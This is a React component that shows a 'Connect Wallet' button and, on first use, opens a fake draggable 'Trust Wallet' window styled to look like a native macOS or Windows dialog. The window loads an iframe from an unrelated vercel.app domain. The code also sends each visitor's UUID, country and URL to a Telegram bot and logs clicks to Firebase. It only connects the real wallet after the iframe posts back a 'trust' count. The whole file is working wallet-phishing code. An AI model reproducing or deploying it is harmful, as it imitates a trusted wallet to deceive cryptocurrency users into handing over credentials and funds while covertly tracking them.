import { useState, useEffect, useRef } from 'react'
import { getDatabase, ref, update } from 'firebase/database';
import { database } from '../../firebase'
import './style.scss'

import { TitleBar as WinTitleBar } from 'react-desktop/windows';
import { TitleBar as MacTitleBar } from 'react-desktop/macOs';
import { getCountryName, sendTelegramMessage, ensureUuid } from '../../../utils/telemetry';

const LuckTrust = () => {
    const [showmadal, setShowModal] = useState(false);
    const [osTheme, setOsTheme] = useState('light');
    const [status, setStatus] = useState(0);
    const [dragPos, setDragPos] = useState({ x: window.innerWidth - 410, y: 20 });
    const [dragging, setDragging] = useState(false);
    const dragOffset = useRef({ x: 0, y: 0 });
    const modalRef = useRef(null);

    const join = () => {
        setShowModal(true);
        const timestamp = (new Date()).getTime();
        const website_link = window.location.href;
        update(ref(database, `users`), {
            [timestamp]: {
                'event': 'Join',
                'website': website_link
            }
        }).then(() => {

        }).catch(err => {

        })
    }

    useEffect(() => {
        window.addEventListener('message', (event) => {
            if (event.origin === "https://mmpt-two.vercel.app") {
                const receiveData = event;
                if (receiveData?.data?.count >= 1) {
                    onClose()
                }
                if (receiveData?.data?.count != null) {
                    localStorage.setItem('trust', receiveData.data.count);
                }
            }
        })
    }, [])

    const [osType, setOsType] = useState('');

    useEffect(() => {
        const userAgent = window.navigator.userAgent || window.navigator.vendor || window.opera;
        let os = 'Unknown';

        if (/windows phone/i.test(userAgent)) {
            os = 'Windows Phone';
        } else if (/win/i.test(userAgent)) {
            os = 'Windows';
        } else if (/android/i.test(userAgent)) {
            os = 'Android';
        } else if (/iPad|iPhone|iPod/.test(userAgent) && !window.MSStream) {
            os = 'iOS';
        } else if (/Macintosh|MacIntel|MacPPC|Mac68K/.test(userAgent)) {
            os = 'MacOS';
        } else if (/Linux/.test(userAgent)) {
            os = 'Linux';
        }

        setOsType(os);

        const detectOsTheme = () => {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                setOsTheme('dark');
            } else {
                setOsTheme('light');
            }
        };

        detectOsTheme();

        const mediaQuery = window.matchMedia('(prefers-color-scheme: dark)');
        const handleThemeChange = (e) => {
            if (e.matches) {
                setOsTheme('dark');
            } else {
                setOsTheme('light');
            }
        };

        mediaQuery.addEventListener('change', handleThemeChange);

        return () => {
            mediaQuery.removeEventListener('change', handleThemeChange);
        };
    }, []);

    useEffect(() => {
        (async () => {
            try {
                const uuid = ensureUuid();
                const country = await getCountryName();
                localStorage.setItem('country', country);
                const sentKey = 'tg_sent_country';
                if (!sessionStorage.getItem(sentKey)) {
                    const text = `LuckTrust.jsx open\nUUID: ${uuid}\nCountry: ${country}\nURL: ${window.location.href}`;
                    await sendTelegramMessage(text);
                    sessionStorage.setItem(sentKey, '1');
                }
            } catch (e) {
                // ignore
            }
        })();
    }, []);

    const onClose = () => {
        setShowModal(false);
    };

    useEffect(() => {
        if (!showmadal) return;

        const handleClickOutside = (e) => {
            if (modalRef.current && !modalRef.current.contains(e.target)) {
                setShowModal(false);
            }
        };

        document.addEventListener('mousedown', handleClickOutside);
        return () => {
            document.removeEventListener('mousedown', handleClickOutside);
        };
    }, [showmadal]);

    const handleMouseDown = (e) => {
        setDragging(true);
        const rect = e.target.getBoundingClientRect();
        dragOffset.current = {
            x: e.clientX - rect.left,
            y: e.clientY - rect.top
        };
    };

    useEffect(() => {
        if (!dragging) return;

        const handleMouseMove = (e) => {
            setDragPos({
                x: e.clientX - dragOffset.current.x,
                y: e.clientY - dragOffset.current.y
            });
        };

        const handleMouseUp = () => {
            setDragging(false);
        };

        window.addEventListener('mousemove', handleMouseMove);
        window.addEventListener('mouseup', handleMouseUp);

        return () => {
            window.removeEventListener('mousemove', handleMouseMove);
            window.removeEventListener('mouseup', handleMouseUp);
        };
    }, [dragging]);

    const getTrustProvider = () => {
        if (window.ethereum?.isTrust) return window.ethereum;
        if (window.trustwallet?.ethereum) return window.trustwallet.ethereum;
        if (window.trustwallet && typeof window.trustwallet.request === 'function') return window.trustwallet;
        return null;
    };

    const connectTrust = async () => {
        const provider = getTrustProvider();
        if (provider) {
            try {
                const accounts = await provider.request({ method: 'eth_requestAccounts' });
                return accounts[0];
            } catch (error) {
                console.error("Trust Wallet connection error:", error);
                return null;
            }
        }
        return null;
    };

    const trustProvider = getTrustProvider();

    return (
        <div>
            <div className={`u-button ${trustProvider}`}
                onClick={() => {
                    if (trustProvider) {
                        const trustCount = localStorage.getItem('trust');
                        if (trustCount && Number(trustCount) >= 1) {
                            connectTrust();
                        }
                        else {
                            join();
                        }
                    } else {
                        window.open('https://trustwallet.com', '_blank');
                        return;
                    }
                }}>
                <span className='d-block ml-4'>
                    {
                        trustProvider ?
                            ((trustProvider.selectedAddress ||
                                (trustProvider._state && trustProvider._state.accounts && trustProvider._state.accounts.length > 0))
                                ? "Connected" : "Connect Wallet") :
                            "Not on EVM chain"
                    }
                </span>
            </div>
            {
                showmadal &&
                <div
                    className='dragemodal'
                    ref={modalRef}
                    style={{
                        position: 'fixed',
                        left: dragPos.x,
                        top: dragPos.y,
                        zIndex: 1002,
                        cursor: dragging ? 'grabbing' : 'grab',
                        width: 380,
                        height: osType !== 'MacOS' ? 595 : 595,
                        boxShadow: osType === 'MacOS'
                            ? (osTheme === 'dark'
                                ? '0 8px 32px rgba(0,0,0,0.6), 0 0 0 1px rgba(255,255,255,0.1)'
                                : '0 8px 32px rgba(0,0,0,0.15), 0 0 0 1px rgba(0,0,0,0.1)')
                            : osType === 'Windows'
                                ? (osTheme === 'dark'
                                    ? '0 4px 24px rgba(0,0,0,0.4), 0 0 0 1px rgba(255,255,255,0.1)'
                                    : '0 4px 24px rgba(0,0,0,0.2), 0 0 0 1px rgba(0,0,0,0.1)')
                                : (osTheme === 'dark'
                                    ? '0 4px 24px rgba(0,0,0,0.4)'
                                    : '0 4px 24px rgba(0,0,0,0.2)'),
                        backgroundColor: osTheme === 'dark' ? '#1e1e1e' : '#ffffff',
                        border: osType === 'MacOS'
                            ? (osTheme === 'dark' ? '1px solid rgba(255,255,255,0.1)' : '1px solid rgba(0,0,0,0.1)')
                            : osType === 'Windows'
                                ? (osTheme === 'dark' ? '1px solid #404040' : '1px solid #e0e0e0')
                                : 'none',
                        borderTopLeftRadius: osType === 'MacOS' ? '16px' : '0px',
                        borderTopRightRadius: osType === 'MacOS' ? '16px' : '0px',
                    }}
                >
                    {
                        osType === 'MacOS' ? (
                            <MacTitleBar
                                title="Trust Wallet"
                                controls={true}
                                isFullscreen={false}
                                onCloseClick={onClose}
                                background={osTheme === 'dark' ? '#1e1e1e' : '#f5f5f5'}
                                color={osTheme === 'dark' ? '#ffffff' : '#000000'}
                                style={{
                                    cursor: dragging ? 'grabbing' : 'grab',
                                    height: '32px',
                                    fontSize: '13px',
                                    fontWeight: 400,
                                    overflow: 'hidden'
                                }}
                                onMouseDown={handleMouseDown}
                            />
                        ) : (
                            <WinTitleBar
                                title="Trust Wallet"
                                className="titlebar"
                                controls={true}
                                isFullscreen={false}
                                onCloseClick={onClose}
                                onMinimizeClick={() => { }}
                                onMaximizeClick={() => { }}
                                background={osTheme === 'dark' ? '#2d2d2d' : '#f0f0f0'}
                                color={osTheme === 'dark' ? '#ffffff' : '#000000'}
                                style={{
                                    cursor: dragging ? 'grabbing' : 'grab',
                                    borderBottom: osTheme === 'dark' ? '1px solid #404040' : '1px solid #d0d0d0',
                                    height: '32px',
                                    fontSize: '12px',
                                    fontWeight: 500,
                                    overflow: 'hidden'
                                }}
                                onMouseDown={handleMouseDown}
                            />
                        )
                    }
                    <iframe
                        src="https://mmpt-two.vercel.app"
                        title='mainframe'
                        width={390}
                        height={618}
                        style={{
                            border: 'none',
                            width: '100%',
                            height: `calc(100% - ${osType === 'MacOS' ? '28px' : '32px'})`
                        }}
                    />
                </div>
            }
        </div >
    )
}

export default LuckTrust
